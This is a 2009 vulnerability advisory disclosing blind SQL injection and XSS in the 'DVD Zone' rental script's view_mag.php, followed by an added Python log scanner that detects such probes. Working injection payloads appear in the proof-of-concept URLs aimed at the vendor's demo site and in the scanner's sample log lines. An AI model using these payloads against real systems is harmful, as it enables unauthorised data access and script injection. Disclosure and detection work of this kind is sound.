[x]========================================================================================================================================[x]
|                                                            AntiSecurity[dot]org                                                        |
[x]========================================================================================================================================[x]
[x]========================================================================================================================================[x]
| Title    : DVD Zone view_mag.php?mag_id= (BSQL/XSS) Multiple Remote Vulnerabilities                                                   |
| Software : DVD Zone Boast Your DVD Rental Business                                                                                     |
| Vendor   : http://www.vastal.com/                                                                                                      |
| Demo     : http://dvdzone.vastal.com                                                                                                   |
| Price    : $399.99                                                                                                                     |
| Date     : 22 September 2009 ( Indonesia )                                                                                             |
| Author   : OoN_Boy                                                                                                                     |
| Contact  : oon.boy9@gmail.com                                                                                                          |
| Web      : http://oonboy.info                                                                                                          |
| Blog     : http://oonboy.blogspot.com                                                                                                  |
[x]========================================================================================================================================[x]
[x]========================================================================================================================================[x]
| Description : You can boast the revenue generated by your DVD Rental Business by allowing the users to order online. We have           |
|               provided many features which can be really useful for the users who may wish to rent a DVD. They can add a DVD in       |
|               their wish list and can move the DVD's on their wish list up or down depending on the priority on which they want        |
|               to rent that DVD. They can see the DVD's which have been sent to them and are on their hands by just visiting            |
|               their account. So there is no delay in returning them. You have full control of the genres you want to use through      |
|               our extensive admin panel. You can add as many DVD's as you want with just a click. You have full control over the      |
|               CMS of the website, you can edit it on the fly. We have provided a HTML WYSIWYG Editor so you do not have to do         |
|               any kind of programming. Please check out the demo site to see the script in action                                     |
[x]========================================================================================================================================[x]
[x]========================================================================================================================================[x]
| Google Dork : uh ah oh....                                                                                                             |
[x]========================================================================================================================================[x]
[x]========================================================================================================================================[x]
| Exploit : http://localhost/[path]/view_mag.php?mag_id=[sql]                                                                            |
|         : http://localhost/[path]/view_mag.php?mag_id=[xss]                                                                            |
[x]========================================================================================================================================[x]
[x]========================================================================================================================================[x]
| Proof of concept : http://dvdzone.vastal.com/view_mag.php?mag_id=9+and+substring(@@version,1,1)=5   True                              |
|                    http://dvdzone.vastal.com/view_mag.php?mag_id=9+and+substring(@@version,1,1)=4   False                             |
|                    http://dvdzone.vastal.com/view_mag.php?mag_id=                                                                      |
[x]========================================================================================================================================[x]
[x]========================================================================================================================================[x]
| Greetz : antisecurity.org batamhacker.or.id                                                                                            |
|          Vrs-hCk NoGe Paman zxvf Angela Zhang aJe H312Y yooogy mousekill }^-^{ martfella noname s4va                                   |
|          k1tk4t str0ke kaka11 ^s0n g0ku^ Joe Chawanua Ntc xx_user s3t4n IrcMafia em|nem Pandoe Ronny rere                             |
[x]========================================================================================================================================[x]
[x]========================================================================================================================================[x]
| Note : Happy Eid al-Fitr, please forgive me body and soul, and forgive all my mistakes so far, everyone :)                             |
|        running off.... for a while.... bye bye.....                                                                                    |
[x]========================================================================================================================================[x]
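Added example, not part of the original advisory: defender-side detection of the probe pattern shown in the proof of concept, run over constructed Apache combined-format access-log lines. The log content, client addresses and finding labels are constructed for illustration; the only fact taken from the advisory is that `view_mag.php` expects a numeric `mag_id`, so anything else in that parameter is worth flagging.

```python
import re
from typing import Optional
from urllib.parse import parse_qs, urlsplit

# Constructed access-log lines (not real traffic). Lines 1-2 mirror the
# true/false boolean probes from the advisory, line 3 is a benign request,
# line 4 is a reflected-XSS style probe in the same parameter.
SAMPLE_LOG = """\
203.0.113.7 - - [22/Sep/2009:10:01:02 +0700] "GET /view_mag.php?mag_id=9+and+substring(@@version,1,1)=5 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.7 - - [22/Sep/2009:10:01:05 +0700] "GET /view_mag.php?mag_id=9+and+substring(@@version,1,1)=4 HTTP/1.1" 200 3870 "-" "Mozilla/5.0"
198.51.100.2 - - [22/Sep/2009:10:02:11 +0700] "GET /view_mag.php?mag_id=9 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.7 - - [22/Sep/2009:10:03:40 +0700] "GET /view_mag.php?mag_id=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 5101 "-" "Mozilla/5.0"
"""

# client, timestamp, request target, status, response bytes
REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(?:GET|POST) (\S+) [^"]*" (\d{3}) (\d+|-)')
# boolean-condition fragments typical of blind SQL injection probes
SQL_BOOL_RE = re.compile(r"\b(and|or)\b.+(=|like|substring|@@)", re.IGNORECASE)
# markup or script fragments typical of reflected-XSS probes
XSS_RE = re.compile(r"<\s*/?\s*[a-z]|javascript:|on\w+\s*=", re.IGNORECASE)


def classify_mag_id(value: str) -> Optional[str]:
    """Label one URL-decoded mag_id value; None means it is a plain integer id."""
    if re.fullmatch(r"\d+", value):
        return None  # the only shape a legitimate id should ever have
    if XSS_RE.search(value):
        return "xss-probe"
    if SQL_BOOL_RE.search(value):
        return "blind-sqli-probe"
    return "malformed-id"


def scan_log(text: str) -> list:
    """Return one finding dict per suspicious mag_id seen on view_mag.php."""
    findings = []
    for line in text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        client, ts, target, status, size = m.groups()
        parts = urlsplit(target)
        if not parts.path.endswith("/view_mag.php"):
            continue
        # parse_qs decodes '+' and %XX, so we classify the value the app would see
        for value in parse_qs(parts.query, keep_blank_values=True).get("mag_id", []):
            label = classify_mag_id(value)
            if label:
                findings.append({"client": client, "time": ts, "label": label,
                                 "mag_id": value, "status": status, "bytes": size})
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f)
```

Note the differing response sizes (5120 vs 3870) on the two boolean probes from one client: that oscillation on an otherwise identical path is the other signal worth alerting on, independent of payload syntax.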